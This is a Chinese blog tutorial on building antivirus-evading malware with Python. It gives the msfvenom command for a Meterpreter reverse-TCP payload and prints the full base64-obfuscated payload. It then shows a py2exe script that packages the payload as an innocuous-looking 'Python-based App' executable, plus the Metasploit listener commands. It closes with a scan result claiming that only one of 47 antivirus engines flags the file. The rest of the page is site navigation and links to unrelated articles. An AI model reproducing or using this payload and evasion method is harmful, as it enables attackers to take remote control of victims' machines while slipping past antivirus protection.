编程 Python

使用Python进行防病毒免杀解析

Posted in Python onDecember 13, 2019

很多渗透工具都提供了权限维持的能力，如Metasploit、Empire和Cobalt Strike，但是都会被防病毒软件检测到这种恶意行为。在探讨一个权限维持技巧的时候，似乎越来越多的人关注的是，这个方式会不会被被杀软杀掉？

打造免杀的payload成了一个很重要的话题，在这里，本文将介绍如何使用Pyhton轻松绕过防病毒软件。

0x01 环境准备

1、软件安装

Python 2.7.16 x86：https://www.python.org/ftp/python/2.7.16/python-2.7.16.msi
Py2exe 32位：https://sourceforge.net/projects/py2exe/files/py2exe/0.6.9/py2exe-0.6.9.win32-py2.7.exe/download

2、msfvenom生成Python Payload

msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.28.128 LPORT=443 -f raw -o /var/www/html/evil.py

使用Python进行防病毒免杀解析

evil.py 代码如下：

import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMjguMTI4Jyw0NDMpKQoJCWJyZWFrCglleGNlcHQ6CgkJdGltZS5zbGVlcCg1KQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKGQseydzJzpzfSkK')))

0x02 py2exe 打包Python程序

将evil.py复制到windows，同时创建一个setup.py文件：

from distutils.core import setup
import py2exe
setup(
name = 'Meter',
description = 'Python-based App',
version = '1.0',
console=['evil.py'],
options = {'py2exe': {'bundle_files': 1,'packages':'ctypes','includes': 'base64,sys,socket,struct,time,code,platform,getpass,shutil',}},
zipfile = None,
)

下面的方法运行 evil.py，生成可执行文件。

python ./setup.py py2exe

使用Python进行防病毒免杀解析

0x03 设置监听端口

Kali 运行Metasploit，设置监听：

msfconsole
use exploit/multi/handler
set PAYLOAD python/meterpreter/reverse_tcp
set LHOST 192.168.28.128
set LPORT 443
run

在Windows中运行evil.exe，获得一个meterpreter的会话

使用Python进行防病毒免杀解析

0x04 免杀验证

确认生成的exe文件可正常工作，接下来对evil.exe进行在线病毒扫描，以确认免杀效果如何。
这里我们使用VirSCAN.org-多引擎在线病毒扫描网 v1.02,当前支持 47 款杀毒引擎

使用Python进行防病毒免杀解析

扫描结果：47款杀毒引擎中，只有一个引擎报毒，主流的杀毒软件全部绕过。

网站地址: http://www.virscan.org

参考文章：

https://medium.com/bugbountywriteup/antivirus-evasion-with-python-49185295caf1

总结

以上所述是小编给大家介绍的使用Python进行防病毒免杀，希望对大家有所帮助，如果大家有任何疑问请给我留言，小编会及时回复大家的。在此也非常感谢大家对三水点靠木网站的支持！
如果你觉得本文对你有帮助，欢迎转载，烦请注明出处，谢谢！

使用Python进行防病毒免杀解析

- Author -

Bypass

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

Python 相关文章推荐

Python中使用dom模块生成XML文件示例

Apr 05 Python

Python中super关键字用法实例分析

May 28 Python

Python爬虫爬取美剧网站的实现代码

Sep 03 Python

详解Numpy数组转置的三种方法T、transpose、swapaxes

May 27 Python

解决Django layui {{}}冲突的问题

Aug 29 Python

python3.6环境下安装freetype库和基本使用方法(推荐)

May 10 Python

基于django micro搭建网站实现加水印功能

May 22 Python

Python图像识别+KNN求解数独的实现

Nov 13 Python

用python计算文件的MD5值

Dec 23 Python

python matlab库简单用法讲解

Dec 31 Python

python数据抓取3种方法总结

Feb 07 Python

python 学习GCN图卷积神经网络

May 11 Python

python 使用shutil复制图片的例子

Dec 13 #Python

基于python traceback实现异常的获取与处理

Dec 13 #Python

python 实现批量替换文本中的某部分内容

Dec 13 #Python

django多种支付、并发订单处理实例代码

Dec 13 #Python

Python+OpenCV+图片旋转并用原底色填充新四角的例子

Dec 12 #Python

Python+OpenCV 实现图片无损旋转90°且无黑边

Dec 12 #Python

使用python去除图片白色像素的实例

Dec 12 #Python

You might like

PHP的几个常用数字判断函数代码

2012/04/24 PHP

PHP针对JSON操作实例分析

2015/01/12 PHP

php+mysqli实现将数据库中一张表信息打印到表格里的方法

2015/01/28 PHP

php 替换文章中的图片路径,下载图片到本地服务器的方法

2018/02/06 PHP

最新优化收藏到网摘代码（digg，diigo）

2007/02/07 Javascript

基于jQuery的表格操作插件

2010/04/22 Javascript

网站页面自动跳转实现方法PHP、JSP（下）

2010/08/01 Javascript

避免回车键导致的页面无意义刷新的解决方法

2011/04/12 Javascript

创建公共调用 jQuery Ajax 带返回值

2012/08/01 Javascript

JS.findElementById()使用介绍

2013/09/21 Javascript

jquery ajax请求方式与提示用户正在处理请稍等

2014/09/01 Javascript

javaScript数组迭代方法详解

2016/04/14 Javascript

浅谈js对象属性通过点(.) 和方括号([]) 的不同之处

2016/10/29 Javascript

JavaScript提高加载和执行效率的方法

2017/02/03 Javascript

javaScript实现复选框全选反选事件详解

2020/11/20 Javascript

js+html5实现手机九宫格密码解锁功能

2018/07/30 Javascript

Vue中axios的封装（报错、鉴权、跳转、拦截、提示）

2019/08/20 Javascript

Jquery动态列功能完整实例

2019/08/30 jQuery

Python 初始化多维数组代码

2008/09/06 Python

python编程实现希尔排序

2017/04/13 Python

Python实现读取Properties配置文件的方法

2018/03/29 Python

Python生命游戏实现原理及过程解析（附源代码）

2019/08/01 Python

Python中__repr__和__str__区别详解

2019/11/07 Python

Python3常见函数range()用法详解

2019/12/30 Python

Python 跨.py文件调用自定义函数说明

2020/06/01 Python

欧洲第一的摇滚和金属乐队服装网站：EMP

2017/10/26 全球购物

后备干部考察材料

2014/02/12 职场文书

暖通工程师岗位职责

2014/06/12 职场文书

北京申奥口号

2014/06/19 职场文书

公证委托书

2014/08/01 职场文书

学生会干部自我鉴定2014

2014/09/18 职场文书

2015安全保卫工作总结

2015/04/25 职场文书

2015年六一儿童节活动方案

2015/05/05 职场文书

2016入党心得体会范文

2016/01/06 职场文书

java后台调用接口及处理跨域问题的解决

2022/03/24 Java/Android

Win11如何默认打开软件界面最大化?Win11默认打开软件界面最大化的方法

2022/07/15 数码科技